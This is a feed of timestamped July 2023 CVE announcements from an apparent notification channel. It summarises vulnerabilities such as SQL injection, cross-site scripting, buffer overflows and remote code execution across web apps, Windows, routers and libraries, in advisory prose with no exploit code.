🚨 CVE-2023-34036Reactive web applications that use Spring HATEOAS to produce hypermedia-based responses might be exposed to malicious forwarded headers if they are not behind a trusted proxy that ensures correctness of such headers, or if they don't have anything else in place to handle (and possibly discard) forwarded headers either in WebFlux or at the level of the underlying HTTP server.For the application to be affected, it needs to satisfy the following requirements: * It needs to use the reactive web stack (Spring WebFlux) and Spring HATEOAS to create links in hypermedia-based responses. * The application infrastructure does not guard against clients submitting (X-)Forwarded… headers.🎖@cveNotify |
|
| 2023-07-17 13:58:11 |
🚨 CVE-2023-2003Embedded malicious code vulnerability in Vision1210, in the build 5 of operating system version 4.3, which could allow a remote attacker to store base64-encoded malicious code in the device's data tables via the PCOM protocol, which can then be retrieved by a client and executed on the device.🎖@cveNotify |
|
| 2023-07-17 11:58:14 |
🚨 CVE-2023-26512CWE-502 Deserialization of Untrusted Data at the rabbitmq-connector plugin module in Apache EventMesh (incubating) V1.7.0\V1.8.0 on windows\linux\mac os e.g. platforms allows attackers to send controlled message and remote code execute via rabbitmq messages. Users can use the code under the master branch in project repo to fix this issue, we will release the new version as soon as possible.🎖@cveNotify |
|
| 2023-07-17 11:58:13 |
🚨 CVE-2023-3700Improper Access Control in GitHub repository alextselegidis/easyappointments prior to 1.5.0.🎖@cveNotify |
|
| 2023-07-17 11:58:12 |
🚨 CVE-2023-2760An SQL injection vulnerability exists in TapHome core HandleMessageUpdateDevicePropertiesRequest function before version 2023.2, allowing low privileged users to inject arbitrary SQL directives into an SQL query and execute arbitrary SQL commands and get full reading access. This may also lead to limited write access and temporary Denial-of-Service.🎖@cveNotify |
|
| 2023-07-17 05:58:34 |
🚨 CVE-2023-3694A vulnerability, which was classified as critical, has been found in SourceCodester House Rental and Property Listing 1.0. This issue affects some unknown processing of the file index.php. The manipulation of the argument keywords/location leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-234245 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-17 05:58:33 |
🚨 CVE-2023-30988The IBM i 7.2, 7.3, 7.4, and 7.5 product Facsimile Support for i contains a local privilege escalation vulnerability. A malicious actor with command line access to the host operating system can elevate privileges to gain root access to the host operating system. IBM X-Force ID: 254016.🎖@cveNotify |
|
| 2023-07-17 05:58:32 |
🚨 CVE-2023-3693A vulnerability classified as critical was found in SourceCodester Life Insurance Management System 1.0. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-234244.🎖@cveNotify |
|
| 2023-07-17 05:58:31 |
🚨 CVE-2023-38378The web interface on the RIGOL MSO5000 digital oscilloscope with firmware 00.01.03.00.03 allows remote attackers to execute arbitrary code via shell metacharacters in pass1 to the webcontrol changepwd.cgi application.🎖@cveNotify |
|
| 2023-07-17 05:58:27 |
🚨 CVE-2023-38379The web interface on the RIGOL MSO5000 digital oscilloscope with firmware 00.01.03.00.03 allows remote attackers to change the admin password via a zero-length pass0 to the webcontrol changepwd.cgi application, i.e., the entered password only needs to match the first zero characters of the saved password.🎖@cveNotify |
|
| 2023-07-17 05:58:26 |
🚨 CVE-2023-3689A vulnerability classified as critical was found in Bylancer QuickQR 6.3.7. Affected by this vulnerability is an unknown functionality of the file /blog of the component GET Parameter Handler. The manipulation of the argument s leads to sql injection. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-234235. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-17 05:58:25 |
🚨 CVE-2023-3688A vulnerability classified as critical has been found in Bylancer QuickJob 6.1. Affected is an unknown function of the component GET Parameter Handler. The manipulation of the argument keywords/gender leads to sql injection. It is possible to launch the attack remotely. VDB-234234 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-17 05:58:21 |
🚨 CVE-2023-3687A vulnerability was found in Bylancer QuickVCard 2.1. It has been rated as critical. This issue affects some unknown processing of the file /blog of the component GET Parameter Handler. The manipulation of the argument s leads to sql injection. The attack may be initiated remotely. The identifier VDB-234233 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-17 05:58:20 |
🚨 CVE-2023-3685A vulnerability was found in Nesote Inout Search Engine AI Edition 1.1. It has been classified as problematic. This affects an unknown part of the file /index.php. The manipulation of the argument page leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-234231. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-17 05:58:19 |
🚨 CVE-2023-3684A vulnerability was found in LivelyWorks Articart 2.0.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /change-language/de_DE of the component Base64 Encoding Handler. The manipulation of the argument redirectTo leads to open redirect. The attack may be launched remotely. VDB-234230 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-17 05:58:18 |
🚨 CVE-2023-3683A vulnerability has been found in LivelyWorks Articart 2.0.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /items/search. The manipulation of the argument search_term leads to cross site scripting. The attack can be launched remotely. The identifier VDB-234229 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-17 05:58:14 |
🚨 CVE-2023-33460There's a memory leak in yajl 2.1.0 with use of yajl_tree_parse function. which will cause out-of-memory in server and cause crash.🎖@cveNotify |
|
| 2023-07-17 05:58:13 |
🚨 CVE-2023-3692Unrestricted Upload of File with Dangerous Type in GitHub repository admidio/admidio prior to 4.2.10.🎖@cveNotify |
|
| 2023-07-17 05:58:12 |
🚨 CVE-2021-31294Redis before 6cbea7d allows a replica to cause an assertion failure in a primary server by sending a non-administrative command (specifically, a SET command). NOTE: this was fixed for Redis 6.2.x and 7.x in 2021. Versions before 6.2 were not intended to have safety guarantees related to this.🎖@cveNotify |
|
| 2023-07-15 20:58:14 |
🚨 CVE-2023-2507CleverTap Cordova Plugin version 2.6.2 allows a remote attacker to execute JavaScript code in any application that is opened via a specially constructed deeplink by an attacker.This is possible because the plugin does not correctly validate the data coming from the deeplinks before using them.🎖@cveNotify |
|
| 2023-07-15 20:58:13 |
🚨 CVE-2023-30791Plane version 0.7.1-dev allows an attacker to change the avatar of his profile, which allows uploading files with HTML extension that interprets both HTML and JavaScript.🎖@cveNotify |
|
| 2023-07-15 18:58:14 |
🚨 CVE-2023-3682A vulnerability, which was classified as critical, was found in Nesote Inout Blockchain EasyPayments 1.0. Affected is an unknown function of the file /index.php/payment/getcoinaddress of the component POST Parameter Handler. The manipulation of the argument coinid leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-234228. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-15 15:58:13 |
🚨 CVE-2023-2975Issue summary: The AES-SIV cipher implementation contains a bug that causesit to ignore empty associated data entries which are unauthenticated asa consequence.Impact summary: Applications that use the AES-SIV algorithm and want toauthenticate empty data entries as associated data can be mislead by removingadding or reordering such empty entries as these are ignored by the OpenSSLimplementation. We are currently unaware of any such applications.The AES-SIV algorithm allows for authentication of multiple associateddata entries along with the encryption. To authenticate empty data theapplication has to call EVP_EncryptUpdate() (or EVP_CipherUpdate()) withNULL pointer as the output buffer and 0 as the input buffer length.The AES-SIV implementation in OpenSSL just returns success for such a callinstead of performing the associated data authentication operation.The empty data thus will not be authenticated.As this issue does not affect non-empty associated data authentication andwe expect it to be rare for an application to use empty associated dataentries this is qualified as Low severity issue.🎖@cveNotify |
|
| 2023-07-15 13:58:13 |
🚨 CVE-2023-3681A vulnerability classified as problematic was found in Campcodes Retro Cellphone Online Store 1.0. This vulnerability affects unknown code of the file /admin/modal_add_product.php. The manipulation of the argument description leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-234226 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-15 10:58:32 |
🚨 CVE-2023-3679A vulnerability was found in SourceCodester Lost and Found Information System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /classes/Master.php?f=save_inquiry of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-234224.🎖@cveNotify |
|
| 2023-07-15 10:58:31 |
🚨 CVE-2023-3680A vulnerability classified as critical has been found in SourceCodester Lost and Found Information System 1.0. This affects an unknown part of the file /classes/Master.php?f=save_item of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-234225 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-15 10:58:29 |
🚨 CVE-2023-3678A vulnerability was found in SourceCodester AC Repair and Services System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php?f=delete_inquiry of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-234223.🎖@cveNotify |
|
| 2023-07-15 05:58:29 |
🚨 CVE-2023-3291Heap-based Buffer Overflow in GitHub repository gpac/gpac prior to 2.2.2.🎖@cveNotify |
|
| 2023-07-15 05:58:28 |
🚨 CVE-2023-3012NULL Pointer Dereference in GitHub repository gpac/gpac prior to 2.2.2.🎖@cveNotify |
|
| 2023-07-15 05:58:24 |
🚨 CVE-2023-0760Heap-based Buffer Overflow in GitHub repository gpac/gpac prior to V2.1.0-DEV.🎖@cveNotify |
|
| 2023-07-15 05:58:23 |
🚨 CVE-2023-38349PNP4Nagios through 81ebfc5 lacks CSRF protection in the AJAX controller. This affects 0.6.26.🎖@cveNotify |
|
| 2023-07-15 05:58:22 |
🚨 CVE-2023-35802IQ Engine before 10.6r1 on Extreme Network AP devices has a Buffer Overflow in the implementation of the CAPWAP protocol that may be exploited to obtain elevated privileges to conduct remote code execution. Access to the internal management interface/subnet is required to conduct the exploit.🎖@cveNotify |
|
| 2023-07-15 05:58:21 |
🚨 CVE-2023-3560A vulnerability, which was classified as problematic, has been found in GZ Scripts Ticket Booking Script 1.8. Affected by this issue is some unknown functionality of the file /load.php. The manipulation of the argument first_name/second_name/phone/address_1/country leads to cross site scripting. The attack may be launched remotely. VDB-233354 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-15 05:58:17 |
🚨 CVE-2023-3564A vulnerability was found in GZ Scripts GZ Multi Hotel Booking System 1.8. It has been classified as problematic. Affected is an unknown function of the file /index.php. The manipulation of the argument adults/children/cal_id leads to cross site scripting. It is possible to launch the attack remotely. VDB-233358 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-15 05:58:16 |
🚨 CVE-2023-35344Windows DNS Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-07-15 05:58:15 |
🚨 CVE-2023-35342Windows Image Acquisition Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-07-15 05:58:14 |
🚨 CVE-2023-35343Windows Geolocation Service Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-07-15 00:58:38 |
🚨 CVE-2023-3562A vulnerability has been found in GZ Scripts PHP CRM Platform 1.8 and classified as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument action leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-233356. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-15 00:58:37 |
🚨 CVE-2023-3561A vulnerability, which was classified as problematic, was found in GZ Scripts PHP GZ Hotel Booking Script 1.8. This affects an unknown part of the file /load.php. The manipulation of the argument first_name/second_name/phone/address_1/country leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-233355. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-15 00:58:36 |
🚨 CVE-2023-3559A vulnerability classified as problematic was found in GZ Scripts PHP GZ Appointment Scheduling Script 1.8. Affected by this vulnerability is an unknown functionality of the file /load.php. The manipulation of the argument first_name/second_name/phone/address_1/country leads to cross site scripting. The attack can be launched remotely. The identifier VDB-233353 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-15 00:58:32 |
🚨 CVE-2023-3557A vulnerability was found in GZ Scripts Property Listing Script 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /preview.php. The manipulation of the argument page/layout/sort_by leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-233351. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-15 00:58:31 |
🚨 CVE-2023-3555A vulnerability was found in GZ Scripts PHP Vacation Rental Script 1.8. It has been classified as problematic. This affects an unknown part of the file /preview.php. The manipulation of the argument page/layout/sort_by/property_id leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-233349 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-15 00:58:30 |
🚨 CVE-2023-3554A vulnerability was found in GZ Scripts GZ Forum Script 1.8 and classified as problematic. Affected by this issue is some unknown functionality of the file /preview.php. The manipulation of the argument catid/topicid/topic/topic_message/free_name leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-233348. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-15 00:58:29 |
🚨 CVE-2023-3558A vulnerability classified as problematic has been found in GZ Scripts Event Booking Calendar 1.8. Affected is an unknown function of the file /load.php. The manipulation of the argument first_name/second_name/phone/address_1/country leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-233352. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-15 00:58:26 |
🚨 CVE-2023-37793WAYOS FBM-291W 19.09.11V was discovered to contain a buffer overflow via the component /upgrade_filter.asp.🎖@cveNotify |
|
| 2023-07-15 00:58:25 |
🚨 CVE-2023-37794WAYOS FBM-291W 19.09.11V was discovered to contain a command injection vulnerability via the component /upgrade_filter.asp.🎖@cveNotify |
|
| 2023-07-15 00:58:24 |
🚨 CVE-2023-36810pypdf is a pure-python PDF library capable of splitting, merging, cropping, and transforming the pages of PDF files. An attacker who uses this vulnerability can craft a PDF which leads to unexpected long runtime. This quadratic runtime blocks the current process and can utilize a single core of the CPU by 100%. It does not affect memory usage. This issue has been addressed in PR 808 and versions from 1.27.9 include this fix. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-07-15 00:58:23 |
🚨 CVE-2023-36466Discourse is an open source discussion platform. When editing a topic, there is a vulnerability that enables a user to bypass the topic title validations for things like title length, number of emojis in title and blank topic titles. The issue is patched in the latest stable, beta and tests-passed version of Discourse.🎖@cveNotify |
|
| 2023-07-15 00:58:19 |
🚨 CVE-2023-38336netkit-rcp in rsh-client 0.17-24 allows command injection via filenames because /bin/sh is used by susystem, a related issue to CVE-2006-0225, CVE-2019-7283, and CVE-2020-15778.🎖@cveNotify |
|
| 2023-07-15 00:58:18 |
🚨 CVE-2023-34236Weave GitOps Terraform Controller (aka Weave TF-controller) is a controller for Flux to reconcile Terraform resources in a GitOps way. A vulnerability has been identified in Weave GitOps Terraform Controller which could allow an authenticated remote attacker to view sensitive information. This vulnerability stems from Weave GitOps Terraform Runners (`tf-runner`), where sensitive data is inadvertently printed - potentially revealing sensitive user data in their pod logs. In particular, functions `tfexec.ShowPlan`, `tfexec.ShowPlanRaw`, and `tfexec.Output` are implicated when the `tfexec` object set its `Stdout` and `Stderr` to be `os.Stdout` and `os.Stderr`. An unauthorized remote attacker could exploit this vulnerability by accessing these prints of sensitive information, which may contain configurations or tokens that could be used to gain unauthorized control or access to resources managed by the Terraform controller. A successful exploit could allow the attacker to utilize this sensitive data, potentially leading to unauthorized access or control of the system. This vulnerability has been addressed in Weave GitOps Terraform Controller versions `v0.14.4` and `v0.15.0-rc.5`. Users are urged to upgrade to one of these versions to mitigate the vulnerability. As a temporary measure until the patch can be applied, users can add the environment variable `DISABLE_TF_LOGS` to the tf-runners via the runner pod template of the Terraform Custom Resource. This will prevent the logging of sensitive information and mitigate the risk of this vulnerability.🎖@cveNotify |
|
| 2023-07-15 00:58:17 |
🚨 CVE-2023-36818Discourse is an open source discussion platform. In affected versions a request to create or update custom sidebar section can cause a denial of service. This issue has been patched in commit `52b003d915`. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-07-14 22:58:49 |
🚨 CVE-2023-35325Windows Print Spooler Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-07-14 22:58:48 |
🚨 CVE-2023-35322Windows Deployment Services Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-07-14 22:58:47 |
🚨 CVE-2023-35323Windows OLE Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-07-14 22:58:43 |
🚨 CVE-2023-35328Windows Transaction Manager Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-07-14 22:58:42 |
🚨 CVE-2023-35330Windows Extended Negotiation Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-07-14 22:58:41 |
🚨 CVE-2023-35333MediaWiki PandocUpload Extension Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-07-14 22:58:40 |
🚨 CVE-2023-35331Windows Local Security Authority (LSA) Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-07-14 22:58:36 |
🚨 CVE-2023-35329Windows Authentication Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-07-14 22:58:35 |
🚨 CVE-2023-35336Windows MSHTML Platform Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-07-14 22:58:34 |
🚨 CVE-2023-35337Win32k Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-07-14 22:58:33 |
🚨 CVE-2023-35338Windows Peer Name Resolution Protocol Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-07-14 22:58:30 |
🚨 CVE-2023-35335Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability🎖@cveNotify |
|
| 2023-07-14 22:58:29 |
🚨 CVE-2023-37462XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Improper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to an injection vector from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. It is possible to check if an existing installation is vulnerable. See the linked GHSA for instructions on testing an installation. This issue has been patched in XWiki 14.4.8, 14.10.4 and 15.0-rc-1. Users are advised to upgrade. The fix commit `d9c88ddc` can also be applied manually to the impacted document `SkinsCode.XWikiSkinsSheet` and users unable to upgrade are advised to manually patch their installations.🎖@cveNotify |
|
| 2023-07-14 22:58:28 |
🚨 CVE-2023-37472Knowage is an open source suite for business analytics. The application often use user supplied data to create HQL queries without prior sanitization. An attacker can create specially crafted HQL queries that will break subsequent SQL queries generated by the Hibernate engine. The endpoint `_/knowage/restful-services/2.0/documents/listDocument_` calls the `_countBIObjects_` method of the `_BIObjectDAOHibImpl_` object with the user supplied `_label_` parameter without prior sanitization. This can lead to SQL injection in the backing database. Other injections have been identified in the application as well. An authenticated attacker with low privileges could leverage this vulnerability in order to retrieve sensitive information from the database, such as account credentials or business information. This issue has been addressed in version 8.1.8. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-07-14 22:58:27 |
🚨 CVE-2023-37473zenstruck/collections is a set of helpers for iterating/paginating/filtering collections. Passing _callable strings_ (ie `system`) caused the function to be executed. This would result in a limited subset of specific user input being executed as if it were code. This issue has been addressed in commit `f4b1c48820` and included in release version 0.2.1. Users are advised to upgrade. Users unable to upgrade should ensure that user input is not passed to either `EntityRepository::find()` or `query()`.🎖@cveNotify |
|
| 2023-07-14 20:58:14 |
🚨 CVE-2023-36838An Out-of-bounds Read vulnerability in the flow processing daemon (flowd) of Juniper Networks Junos OS on SRX Series allows a local, authenticated attacker with low privileges, to cause a Denial of Service (DoS).If a low privileged user executes a specific CLI command, flowd which is responsible for traffic forwarding in SRX crashes and generates a core dump. This will cause temporary traffic interruption until the flowd process is restarted automatically. Continued execution of this command will lead to a sustained DoS.This issue affects Juniper Networks Junos OS on SRX Series:All versions prior to 20.2R3-S7;20.3 version 20.3R1 and later versions;20.4 versions prior to 20.4R3-S6;21.1 versions prior to 21.1R3-S5;21.2 versions prior to 21.2R3-S4;21.3 versions prior to 21.3R3-S4;21.4 versions prior to 21.4R3-S3;22.1 versions prior to 22.1R3-S1;22.2 versions prior to 22.2R3;22.3 versions prior to 22.3R2;22.4 versions prior to 22.4R1-S1, 22.4R2.🎖@cveNotify |
|
| 2023-07-14 20:58:13 |
🚨 CVE-2023-36119File upload vulnerability in PHPGurukul Online Security Guards Hiring System v.1.0 allows a remote attacker to execute arbitrary code via a crafted php file to the \osghs\admin\images file.🎖@cveNotify |
|
| 2023-07-14 20:58:12 |
🚨 CVE-2023-36831An Improper Check or Handling of Exceptional Conditions vulnerability in the UTM (Unified Threat Management) Web-Filtering feature of Juniper Networks Junos OS on SRX Series causes a jbuf memory leak to occur when accessing certain websites, eventually leading to a Denial of Service (DoS) condition. Service restoration is only possible by rebooting the system.The jbuf memory leak only occurs in SSL Proxy and UTM Web-Filtering configurations. Other products, platforms, and configurations are not affected by this vulnerability.This issue affects Juniper Networks Junos OS on SRX Series:22.2 versions prior to 22.2R3;22.3 versions prior to 22.3R2-S1, 22.3R3;22.4 versions prior to 22.4R1-S2, 22.4R2.This issue does not affect Juniper Networks Junos OS versions prior to 22.2R2.🎖@cveNotify |
|
| 2023-07-14 18:58:25 |
🚨 CVE-2023-33164Remote Procedure Call Runtime Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-07-14 18:58:21 |
🚨 CVE-2021-33798A null pointer dereference was found in libpano13, version libpano13-2.9.20. The flow allows attackers to cause a denial of service and potential code execute via a crafted file.🎖@cveNotify |
|
| 2023-07-14 18:58:20 |
🚨 CVE-2023-33163Windows Network Load Balancing Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-07-14 18:58:19 |
🚨 CVE-2023-33161Microsoft Excel Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-07-14 18:58:15 |
🚨 CVE-2023-33158Microsoft Excel Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-07-14 18:58:14 |
🚨 CVE-2023-33156Microsoft Defender Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-07-14 18:58:13 |
🚨 CVE-2023-37270Piwigo is open source photo gallery software. Prior to version 13.8.0, there is a SQL Injection vulnerability in the login of the administrator screen. The SQL statement that acquires the HTTP Header `User-Agent` is vulnerable at the endpoint that records user information when logging in to the administrator screen. It is possible to execute arbitrary SQL statements. Someone who wants to exploit the vulnerability must be log in to the administrator screen, even with low privileges. Any SQL statement can be executed. Doing so may leak information from the database. Version 13.8.0 contains a fix for this issue. As another mitigation, those who want to execute a SQL statement verbatim with user-enterable parameters should be sure to escape the parameter contents appropriately.🎖@cveNotify |
|
| 2023-07-14 15:58:19 |
🚨 CVE-2023-33868The number of login attempts is not limited. This could allow an attacker to perform a brute force on HTTP basic authentication.🎖@cveNotify |
|
| 2023-07-14 15:58:18 |
🚨 CVE-2023-3433The "nickname" field within Savoir-faire Linux's Jami application is susceptible to a failed state when a user inserts special characters into the field. When present, these special characters, make it so the application cannot create the signature for the user and results in a local denial of service to the application. 🎖@cveNotify |
|
| 2023-07-14 15:58:17 |
🚨 CVE-2023-3434Improper Input Validation in the hyperlink interpretation in Savoir-faire Linux's Jami (version 20222284) on Windows. This allows an attacker to send a custom HTML anchor tag to pass a string value to the Windows QRC Handler through the Jami messenger.🎖@cveNotify |
|
| 2023-07-14 15:58:16 |
🚨 CVE-2023-3673 SQL Injection in GitHub repository pimcore/pimcore prior to 10.5.24.🎖@cveNotify |
|
| 2023-07-14 15:58:15 |
🚨 CVE-2023-28862An issue was discovered in LemonLDAP::NG before 2.16.1. Weak session ID generation in the AuthBasic handler and incorrect failure handling during a password check allow attackers to bypass 2FA verification. Any plugin that tries to deny session creation after the store step does not deny an AuthBasic session.🎖@cveNotify |
|
| 2023-07-14 15:58:14 |
🚨 CVE-2023-20899VMware SD-WAN (Edge) contains a bypass authentication vulnerability. An unauthenticated attacker can download the Diagnostic bundle of the application under VMware SD-WAN Management.🎖@cveNotify |
|
| 2023-07-14 15:58:13 |
🚨 CVE-2023-2975Issue summary: The AES-SIV cipher implementation contains a bug that causesit to ignore empty associated data entries which are unauthenticated asa consequence.Impact summary: Applications that use the AES-SIV algorithm and want toauthenticate empty data entries as associated data can be mislead by removingadding or reordering such empty entries as these are ignored by the OpenSSLimplementation. We are currently unaware of any such applications.The AES-SIV algorithm allows for authentication of multiple associateddata entries along with the encryption. To authenticate empty data theapplication has to call EVP_EncryptUpdate() (or EVP_CipherUpdate()) withNULL pointer as the output buffer and 0 as the input buffer length.The AES-SIV implementation in OpenSSL just returns success for such a callinstead of performing the associated data authentication operation.The empty data thus will not be authenticated.As this issue does not affect non-empty associated data authentication andwe expect it to be rare for an application to use empty associated dataentries this is qualified as Low severity issue.🎖@cveNotify |
|
| 2023-07-14 12:58:13 |
🚨 CVE-2023-3672Cross-site Scripting (XSS) - DOM in GitHub repository plaidweb/webmention.js prior to 0.5.5.🎖@cveNotify |
|
| 2023-07-14 06:58:28 |
🚨 CVE-2023-34241OpenPrinting CUPS is a standards-based, open source printing system for Linux and other Unix-like operating systems. Starting in version 2.0.0 and prior to version 2.4.6, CUPS logs data of free memory to the logging service AFTER the connection has been closed, when it should have logged the data right before. This is a use-after-free bug that impacts the entire cupsd process.The exact cause of this issue is the function `httpClose(con->http)` being called in `scheduler/client.c`. The problem is that httpClose always, provided its argument is not null, frees the pointer at the end of the call, only for cupsdLogClient to pass the pointer to httpGetHostname. This issue happens in function `cupsdAcceptClient` if LogLevel is warn or higher and in two scenarios: there is a double-lookup for the IP Address (HostNameLookups Double is set in `cupsd.conf`) which fails to resolve, or if CUPS is compiled with TCP wrappers and the connection is refused by rules from `/etc/hosts.allow` and `/etc/hosts.deny`.Version 2.4.6 has a patch for this issue.🎖@cveNotify |
|
| 2023-07-14 06:58:27 |
🚨 CVE-2022-33324Improper Resource Shutdown or Release vulnerability in Mitsubishi Electric Corporation MELSEC iQ-R Series R00/01/02CPU Firmware versions "32" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R04/08/16/32/120(EN)CPU Firmware versions "65" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R08/16/32/120SFCPU Firmware versions "29" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R12CCPU-V all versions, Mitsubishi Electric Corporation MELSEC iQ-L Series L04/08/16/32HCPU all versions and Mitsubishi Electric Corporation MELIPC Series MI5122-VW all versions allows a remote unauthenticated attacker to cause a Denial of Service condition in Ethernet communication on the module by sending specially crafted packets. A system reset of the module is required for recovery.🎖@cveNotify |
|
| 2023-07-14 06:58:25 |
🚨 CVE-2023-3668Improper Encoding or Escaping of Output in GitHub repository froxlor/froxlor prior to 2.0.21.🎖@cveNotify |
|
| 2023-07-14 06:58:24 |
🚨 CVE-2023-37715Tenda F1202 V1.0BR_V1.2.0.20(408), FH1202_V1.2.0.19_EN were discovered to contain a stack overflow in the page parameter in the function frmL7ProtForm.🎖@cveNotify |
|
| 2023-07-14 06:58:23 |
🚨 CVE-2023-37716Tenda F1202 V1.0BR_V1.2.0.20(408) and FH1202_V1.2.0.19_EN, AC10 V1.0, AC1206 V1.0, AC7 V1.0, AC5 V1.0, and AC9 V3.0 were discovered to contain a stack overflow in the page parameter in the function fromNatStaticSetting.🎖@cveNotify |
|
| 2023-07-14 06:58:21 |
🚨 CVE-2023-37723Tenda F1202 V1.0BR_V1.2.0.20(408), FH1202_V1.2.0.19_EN were discovered to contain a stack overflow in the page parameter in the function fromqossetting.🎖@cveNotify |
|
| 2023-07-14 06:58:20 |
🚨 CVE-2023-37466vm2 is an advanced vm/sandbox for Node.js. The library contains critical security issues and should not be used for production. The maintenance of the project has been discontinued. In vm2 for versions up to 3.9.19, `Promise` handler sanitization can be bypassed with `@@species` accessor property allowing attackers to escape the sandbox and run arbitrary code. Remote Code Execution, assuming the attacker has arbitrary code execution primitive inside the context of vm2 sandbox.🎖@cveNotify |
|
| 2023-07-14 06:58:19 |
🚨 CVE-2023-37714Tenda F1202 V1.0BR_V1.2.0.20(408), FH1202_V1.2.0.19_EN were discovered to contain a stack overflow in the page parameter in the function fromRouteStatic.🎖@cveNotify |
|
| 2023-07-14 06:58:18 |
🚨 CVE-2023-37717Tenda F1202 V1.0BR_V1.2.0.20(408) and FH1202_V1.2.0.19_EN, AC10 V1.0, AC1206 V1.0, AC7 V1.0, AC5 V1.0, and AC9 V3.0 were discovered to contain a stack overflow in the page parameter in the function fromDhcpListClient.🎖@cveNotify |
|
| 2023-07-14 06:58:16 |
🚨 CVE-2023-37718Tenda F1202 V1.0BR_V1.2.0.20(408), FH1202_V1.2.0.19_EN were discovered to contain a stack overflow in the page parameter in the function fromSafeClientFilter.🎖@cveNotify |
|
| 2023-07-14 06:58:15 |
🚨 CVE-2023-37721Tenda F1202 V1.0BR_V1.2.0.20(408), FH1202_V1.2.0.19_EN were discovered to contain a stack overflow in the page parameter in the function fromSafeMacFilter.🎖@cveNotify |
|
| 2023-07-14 06:58:14 |
